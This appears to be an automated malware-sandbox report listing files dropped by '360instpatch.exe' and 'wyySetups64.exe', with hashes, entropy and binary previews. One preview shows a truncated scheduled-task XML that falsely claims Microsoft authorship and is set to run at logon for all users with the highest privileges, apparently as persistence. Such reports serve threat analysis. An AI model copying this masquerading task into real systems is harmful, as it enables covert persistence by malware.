                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:NlllulBkXj:NllUS
                                                                                                                                                                                                            MD5:453075887941F85A80949CDBA8D49A8B
                                                                                                                                                                                                            SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                                                                                                                                                            SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                                                                                                                                                            SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:@...e................................................@..........

                                                                                                                                                                                                            C:\Users\user\AppData\Local\PolicyManagement.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\wyySetups64.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1893
                                                                                                                                                                                                            Entropy (8bit):5.212287775015203
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                                                                                                                                            MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                                                                                                                                            SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                                                                                                                                            SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                                                                                                                                            SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\!@t3CA2.tmp (copy)

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):648
                                                                                                                                                                                                            Entropy (8bit):7.46325903759004
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
                                                                                                                                                                                                            MD5:DCF8A1E58C81782DC11CFF675B105B63
                                                                                                                                                                                                            SHA1:08D4821471E445965CAEAD5093AF44460CD74B92
                                                                                                                                                                                                            SHA-256:034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
                                                                                                                                                                                                            SHA-512:E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MSCF............,...................F.......V..........YvT .setup.ini....C:.V.CKeQ..A..7.?......jQO...3..AB'i3.N:t.0..GnD...K....`.0.g...{..U..*`..i..eY.5.U}v.^..}{.-....r..O..U{..d~_..'.v;...........,.EY.....&.....]]-...g._.eqq[.+.W.z.....?.|.....]o......~N...B...,^.].iw.....z}{.6....'..).Y..2P..]..(&kZ.!..2o.=... ..y..!..It.P....HTL.K..]....<...E...|.....?.>.....Bg.......o.M...ud......1..B..#P..'......3N......G.].....y4.......g.j}c...9..w..G....A....z...*.8..F/.s:..4U.....\Z..1.....{O"...Io..(.0.P:...BJ.<..::..x$*#...NF.<..F.`...E.r.L ..9KS .r..5..-b".h~[.1...dIa..ia...s...Az...W.Y.-...H.q.......<...`....0@J.....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\!@t3CA2.tmp.P2P

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):648
                                                                                                                                                                                                            Entropy (8bit):7.46325903759004
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
                                                                                                                                                                                                            MD5:DCF8A1E58C81782DC11CFF675B105B63
                                                                                                                                                                                                            SHA1:08D4821471E445965CAEAD5093AF44460CD74B92
                                                                                                                                                                                                            SHA-256:034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
                                                                                                                                                                                                            SHA-512:E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MSCF............,...................F.......V..........YvT .setup.ini....C:.V.CKeQ..A..7.?......jQO...3..AB'i3.N:t.0..GnD...K....`.0.g...{..U..*`..i..eY.5.U}v.^..}{.-....r..O..U{..d~_..'.v;...........,.EY.....&.....]]-...g._.eqq[.+.W.z.....?.|.....]o......~N...B...,^.].iw.....z}{.6....'..).Y..2P..]..(&kZ.!..2o.=... ..y..!..It.P....HTL.K..]....<...E...|.....?.>.....Bg.......o.M...ud......1..B..#P..'......3N......G.].....y4.......g.j}c...9..w..G....A....z...*.8..F/.s:..4U.....\Z..1.....{O"...Io..(.0.P:...BJ.<..::..x$*#...NF.<..F.`...E.r.L ..9KS .r..5..-b".h~[.1...dIa..ia...s...Az...W.Y.-...H.q.......<...`....0@J.....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\!@t3CA2.tmp.dir\setup.ini

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Generic INItialization configuration [360Safe]
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):854
                                                                                                                                                                                                            Entropy (8bit):5.54815735280418
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:9QQ08ETkByYcqQZLTvOIuAALne2toBFjlVH:9QUETacqQJWIdAzxtonlV
                                                                                                                                                                                                            MD5:CB13859BCE5ADF79C6B2E1C4601FA06A
                                                                                                                                                                                                            SHA1:5562D46E7FBD8A3FF92AFE2270B23F5E73FF45D7
                                                                                                                                                                                                            SHA-256:601CFCA4A7123503331D7641666F7F48164AEB2494B007ECE4C8880F51AF6E2D
                                                                                                                                                                                                            SHA-512:C355FAE3C70B875A08F4BA8BC7D9463D5DB686D2113970F0ED17A5D723DA2ADF82334AFAF3345AABB51A2A89873C15926341AA18D90FF374FA1FB68B82BF3AC4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:[360Installer]..SlideShowResourceURL=http://down.360safe.com/360safe/slideshow_new.cab..From=h_inst..Product=360Safe....[360Safe]..Name=360........Pid=h_inst..FID=setup_13.0.0.2008k..Version=13.0.0.2009..RegVersionFile=360Ver.dll..IsBeta=0..Urls=pdown://b2=100027000|p2=B0A12507C5F7FB22D8E1EB5B2682074BD0218EF0|p3=20|p7=15|c2=1|b5=360......|b6=........|b7=5|b9=1|http://dl.360safe.com/setup_13.0.0.2008k.exe..MD5FileID=E901BD5EEF684DD36520382E5FC26236..SetupParam=/pid=h_inst /noreboot=1 /installer=1 /S..SlideShowImage=360safe_1.png,360safe_2.png,360safe_3.png,....[360signdata]..sign=0100000094BB9E7DD93895D39142938A10B443920CBE15CC1E5C20E47CA37526F047D27B4EE9567798C27E09EB3C005E187E0CE1A9B7EA4C2DA5D92120A8B6ABEBF270462455BBA3FD1AA5ACE5C44196EF1083BB9FAEDAD4C74F82DEFB96A173B5519816D7C03F06C87BAC684A0CF6FB459E487DCDEF38C3AF0864CB102E42D0FF3412A0

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\!@t3CA2.tmp.mem

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17
                                                                                                                                                                                                            Entropy (8bit):2.409267252251469
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:lsS+n:U
                                                                                                                                                                                                            MD5:983514E15961BFDA71A616E3CA412147
                                                                                                                                                                                                            SHA1:8A938B2349A33CB8A45975F5E1084AC4ED702C72
                                                                                                                                                                                                            SHA-256:D22207FA67A53E84F79BEB0C103430CCAC7A6D6EEC028262135DDE91079F5566
                                                                                                                                                                                                            SHA-512:2C3D100D47A806CCB23F9ABCE816869C80B21EF6B6479C5A7BDEE47F9B14FCD004EE99F30ECC39A60AE35B1ADB0D4DAC52E58DABDB1885940A8888AC1E61B60E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.................

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jndynk1.dgs.ps1

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eulqoxph.te0.psm1

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kt5adsyn.rvv.ps1

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_runvla32.afr.psm1

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yidiihbn.hij.ps1

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zi02lekf.zkt.psm1

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\{274982DB-6C6E-4a79-973A-D9541D938086}.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):304652
                                                                                                                                                                                                            Entropy (8bit):7.999195439763513
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:6144:dl5TTOp1tnABtoSIkutXiC3NxDPYhroRN6AxPM1CKSNEZ4:1TmTAB+XddZAahrKGT
                                                                                                                                                                                                            MD5:8039C279A02FEA0387E8D51BDDE541D5
                                                                                                                                                                                                            SHA1:A6A52EF6C01FDE3A1A1C702C41777119DBDB203A
                                                                                                                                                                                                            SHA-256:0BA9A3E6E4B89ED8C30C092845ECAB5939AFE4C701A130FDC6ECC9D0EC1A8386
                                                                                                                                                                                                            SHA-512:97F45BF13FF85AD252B46C8E62D2D114E84B3AEF17AA2E3B21CE47B41B416D2000506EE9BFABBC055295817CE6D7D9771A038ACFAE514CCA852EF861751C7254
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MSCF............,...............(...H.......`..........L.z .360P2SP.dll.h..G.G..[...3.@..."R`4..m....mnu..e.r.\.K.J.....u.Pw..9f..u..H..?7.=z."|..^ ...].fi.r...........biw.Se6".p......;N....o.rI.x...$.IN.><...o......[6.k.[.lRvl..zK.{v.kKh6!36kOi..6.3Z.`.6+.B..c.t2.B)Zq.3$..V.@w......... T..4DWF.`.W..~.<.....73o7&7.L..5....rF....E.....~.@.@{...B~~.ho.D..X..pH+.. ..}-BMrx.".dU....e".nk.D...................L..e...L..~3E.......H.r..6m.G.o..z...g......}....zT.[-.K.{.\......W?..}.^....<.z.W.y.i.z&....@.-..AJN9.[.J.]Z.....k...+.2....M.........H.H...E"....`.....p.,>Q.....D.....>.B.*{..t;bw..hb.....dW8.....eH2.l....^...KyD.Z.`I.........^W..k.$..;n.I..&.>s.8..WF...}......W)...:.-Sp<m..:\..U..]JT....Kw.(.......x.:.-..C..e..a..... {...!Y./1.MnF..05...9......}...+WR8W.z...fe...+..s5.....E.6w.rzP.&..Ii...h.....L$....Z~.}N...W9.6pMt4.f..R...RL.........CH:.Q.-a1... ........Y.......P..B.:M.........l.w..Xn.....VN...7Fk*G...3...H....i.C..`q4.Q.&.9.X...^.p/.K.(....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\{4E37D1B0-FC9E-4af1-8227-2DAA098CDF46}.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:PNG image data, 600 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16151
                                                                                                                                                                                                            Entropy (8bit):7.9414528437087935
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:9SmRt7jn8csHkzjhJuCwQ19rtw5srwat0ADwP0F43ec1:dt7bjsHkBwCwseat0AkdOc1
                                                                                                                                                                                                            MD5:3641846128E0A27A28CA0DBA8942B896
                                                                                                                                                                                                            SHA1:88C40C9923AB48E0C01883A773E297541CE49882
                                                                                                                                                                                                            SHA-256:CBF7CD45FE193E0A438CE14B0176077762E984F897091A682F9E866983DA9174
                                                                                                                                                                                                            SHA-512:15910E5A279F17EA06618CB8DCBB64FE8F8E6F5061FC14BCA6A92FF2795CF64EACEB2067104358A014079550CA1B4F24200935E2F10B1EDE6622D94794047550
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR...X...|.....$m5S...GPLTE..q..q..r....v..#.....(.~+.1...w>...q..q.....r$.v".u..t..t..s..w(.w..q........}*.y..{..'.y-.y#.y1.z.....w..y6.|..{......t....x .".|'...~-.},.:.!.".%.$.(..9.}=.}%.|*./.{J.C.A.?.|+.D.0.2.2.~)...,.0.~?.?...~I.).1.x".'.|G.5.8.{N.Q.G.J.R.Q.Z.5.:.Y.Y.U..X1...M..Hc.i..\H.q..Tv.h...a....tRNS..f..f.f........hE..=pIDATx..m..`.....0..@.)q3.P.A...XDH.Q79_...B..=_;....o.i.r....q].u.....I..........w4.._..wv...E.Vs....x..v.O...>.Z......kw^...O.`..Hb........_. h.t_t:mM.b. 8@...%.)^...i.C....<...:.:a..~....... ..|....Y.l5....`&...-'..-.......&".#....ZB,..VL..../.B,.V.V.W|.Za......CZ.X\.....aT...x".w.}#.bu$.,K.....U.Y..j..U.AQ....W...{u~.....T..agf..:^f./O,.3.g..J"k^.Y....W..z'..T8<.b..ZA*.............*.....f....,*.n`Y.ld.b.K.KDV..b..S.%..F.h.O.WAEd).....#..5`^.D..Y........2&....S..S..Ax.W'....f.....+....]..}.ZQ.d..3...m.3...}.~......C..v.Y.b.........X,...l.1.)N.Y....[.....b=...=.

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\{6B9FF4AD-3BC3-473e-82AA-1C0AF3FCEE40}.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1346052
                                                                                                                                                                                                            Entropy (8bit):7.9989996832434676
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:24576:S25OCGNlwNr5PL8MqxJTFl9YioVgxuz4Z0dTeLieM1V9QPjQw:B0N2NFL8VB9iiL0dTeOt23
                                                                                                                                                                                                            MD5:4F688C8A30E46A14A868F07E283763F2
                                                                                                                                                                                                            SHA1:BA736A93EF1F07B1C7C24F4201B632F1CB18E73A
                                                                                                                                                                                                            SHA-256:AA02BD7AB8BBF1C1AB138C20D0D7EBB6B5F2E2166E2184405E54D619526E9AC8
                                                                                                                                                                                                            SHA-512:8A1F679BFA7A1D5667FAC931EF9184CBE76E30C26ED1A63E97CE4AFD8815DC1409EDB560EE91FD3DB57AA0BE10D6C567F43FE887440A09897DE09CD8DC7BA88A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:MSCF............,.......................Q....l........~Q.. .sites.dll.~m...l....cV.V .themes\theme_NewInstallAir.xml.BT..~.....cV.V .themes\NewInstallAir\NewInstallAir.ui..e..BJ..CK..|T..8z..IrH...L`.A..5....8Q..e.0.......4.T1.....'..v..-...V?.Wm...Uk..g2..Bx)...j.L..0..9w.}......w..w..{....k....k....y.nb...p..4.ie..r...?..0....9a.V.x.....p,.}..........<.h...C...#...q.-(u....]7qb....|..n.y.?.{j.-.9.t.e._F.....s..;.o...+..e.............._.........Gn..[sn6.e.g...V#..j.'.a..8&.y~I,.S.4+...LJf.'O..[.F....).w....ubOf.T...}S!;...D......."......J1.Ma..5...l.T......<....E.._.U..al.....w.......<..H...r......v.............1..o.uz1.......... ./...vE..N..mf...8.Bx..-{.....y.....)....o......z./.....mr.S,-#...9.....]..U....,r.w$`.lH^.R...po...o....8(..6...]..L$. [.~.%...J.V.....).v.s....5..vHu.t....c..z->..y.b..../%..yN+..O.>.ST.."!. dE.T..X..Y.w?........n.Y.-.....:..ZH.}.+..l..-..10..J.bk......~..O.<.k!{.6!Rx..2.8i@[.....S/C....=..:.z..............@....>.

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\{9AE51E5B-D986-4b47-9A8E-7D0F888610BF}.tmp

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:PNG image data, 491 x 161, 8-bit colormap, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1556
                                                                                                                                                                                                            Entropy (8bit):7.507131051649285
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:LZwmgblk3k44Yo4bo4Y4ofXQLo4LoXgMXI7gAgXILs/fHAnzPCpdyIIMGb34oYYI:OpO0P3nfXfX/HXPX/HXai+MGb34Z
                                                                                                                                                                                                            MD5:402C9D31E2079948E743562CB48AF2A6
                                                                                                                                                                                                            SHA1:5111E39A19E0675A44369E03D4A82132F0D12977
                                                                                                                                                                                                            SHA-256:D82DF7AFA80AB17CF1D298488C66902F192034B6BB18176F5BD5C5B74E348E79
                                                                                                                                                                                                            SHA-512:27510489FAA6562507CBDB0B5F545D9124D6BA59D41A65224DD6089A9C8331279CE83905B26D41453255BDA660FBAAE957E0E17D43350DFCB86603888177C760
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR..............g-....pHYs...........~.... cHRM..z%..............u0...`..:....o._.F....PLTE.................................................................................................................................................................................;;;<<<===>>>???@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZ[[[\\\]]]^^^___```aaabbbcccdddeeefffggghhhiiijjjkkklllmmmnnnooopppqqqrrrssstttuuuvvvwwwxxxyyyzzz{{{|||}}}~~~...................................................................................................................................................................................................................................................................................................................................................................................................B.F.....IDATx...[s.D....-.d.%...L...r*.8.....9.pC...d.g.HQf<..7.o....ju.Z.V.n9.[...u......w9wo.[./....U^....9or

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Downloads\360instpatch.exe
                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1469440
                                                                                                                                                                                                            Entropy (8bit):6.242110984104102
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:l4LEubC/9euoUCi82BbjSyM5hGfzmzJHXW+U0:UEubUo1i3eymhGfizJHK0
                                                                                                                                                                                                            MD5:A2FF2C72E739E0CF4C73B623444CA39D
                                                                                                                                                                                                            SHA1:FF886E63C894A20F30C136A8264CFA33D41B8331
                                                                                                                                                                                                            SHA-256:C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC
